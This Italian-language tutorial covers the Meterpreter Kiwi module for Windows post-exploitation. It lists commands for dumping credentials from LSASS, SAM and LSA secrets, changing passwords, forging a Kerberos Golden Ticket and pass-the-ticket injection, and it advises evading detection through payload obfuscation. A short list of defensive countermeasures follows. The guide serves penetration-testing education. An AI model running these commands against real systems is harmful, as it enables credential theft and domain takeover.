Guida Approfondita sul Modulo Kiwi di Meterpreter

Introduzione

Il modulo Kiwi di Meterpreter è una potente estensione che integra funzionalità ispirate direttamente a Mimikatz all'interno di una sessione Meterpreter. Permette di eseguire attività avanzate di post-exploitation come l'estrazione di credenziali, la gestione dei ticket Kerberos e la creazione di Golden Ticket, il tutto senza dover caricare tool esterni.

⚠️ Nota: Il modulo Kiwi può essere rilevato da soluzioni EDR e antivirus. Utilizzare solo in ambienti autorizzati e controllati.

Caricamento del Modulo Kiwi

Comando:

load kiwi

Questo comando carica l'estensione nella sessione Meterpreter corrente. Dopo il caricamento, saranno disponibili tutti i comandi specifici di Kiwi.

creds_all

Descrizione:

Estrae tutte le credenziali accessibili dal sistema. Include password in chiaro, hash, ticket, e altre informazioni recuperabili da LSASS.

Esempio:

kiwi_cmd creds_all

Output Atteso:

Username: Administrator
Domain: LAB
Password: P@ssw0rd123
Hash: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

lsa_dump_sam

Descrizione:

Esegue il dump degli hash SAM dal sistema locale, utile quando si ha accesso come SYSTEM.

Esempio:

kiwi_cmd lsa_dump_sam

lsa_dump_secrets

Descrizione:

Estrae le "LSA Secrets" del sistema Windows, che possono contenere password di servizio, chiavi, o altre credenziali sensibili.

Esempio:

kiwi_cmd lsa_dump_secrets

password_change

Descrizione:

Consente di modificare la password di un utente locale o di dominio direttamente da Meterpreter.

Sintassi:

kiwi_cmd password_change <utente> <nuova_password>

Esempio:

kiwi_cmd password_change Administrator Winter2025!

golden_ticket_create

Descrizione:

Crea un Golden Ticket Kerberos, utilizzabile per ottenere accesso persistente e privilegiato a un dominio Active Directory.

Prerequisiti:

• Hash NTLM del KRBTGT

• SID del dominio

• Nome utente, dominio e ID

Sintassi:

kiwi_cmd golden_ticket_create <utente> <dominio> <sid> <id_rid> <krbtgt_hash>

Esempio:

kiwi_cmd golden_ticket_create Administrator LAB.LOCAL S-1-5-21-123456789-987654321-135792468 500 bbbbccccdddd11112222333344445555

✅ Dopo la creazione, il ticket è automaticamente iniettato nella sessione corrente.

kerberos_ticket_list

Descrizione:

Mostra la lista dei ticket Kerberos attivi caricati in memoria, utile per monitorare sessioni attuali o identificare eventuali residui da attacchi precedenti.

Comando:

kiwi_cmd kerberos_ticket_list

kerberos_ticket_use

Descrizione:

Inietta un ticket Kerberos .kirbi nella sessione corrente per eseguire un attacco Pass-the-Ticket.

Sintassi:

kiwi_cmd kerberos_ticket_use <percorso_ticket.kirbi>

Esempio:

kiwi_cmd kerberos_ticket_use C:\Users\Public\ticket.kirbi

⚠️ Il ticket deve essere stato esportato da una macchina compromessa o generato con Mimikatz.

Best Practice nell'Uso del Modulo Kiwi

• Elevare sempre i privilegi prima di caricare Kiwi (privilege escalation → SYSTEM)

• Usare tecniche di evasione: offuscare il payload, usare stage-less shellcode

• Monitorare l’ambiente: evitare persistente in memoria se non necessario

Contromisure Difensive

• Abilitare Credential Guard e LSA Protection

• Monitorare accessi a LSASS e modifiche anomale ai ticket Kerberos

• Impiegare EDR con behavioral analysis

• Isolare le sessioni ad alto privilegio (es. PAM)

Conclusione

Il modulo Kiwi rappresenta un'estensione cruciale per ogni attività avanzata di post-exploitation in ambienti Windows. Offre la versatilità di Mimikatz direttamente integrata in Meterpreter, riducendo il bisogno di tool esterni e migliorando l’efficienza operativa.

Utilizzato con consapevolezza e cautela, è un alleato potente nelle mani di un red teamer o penetration tester esperto.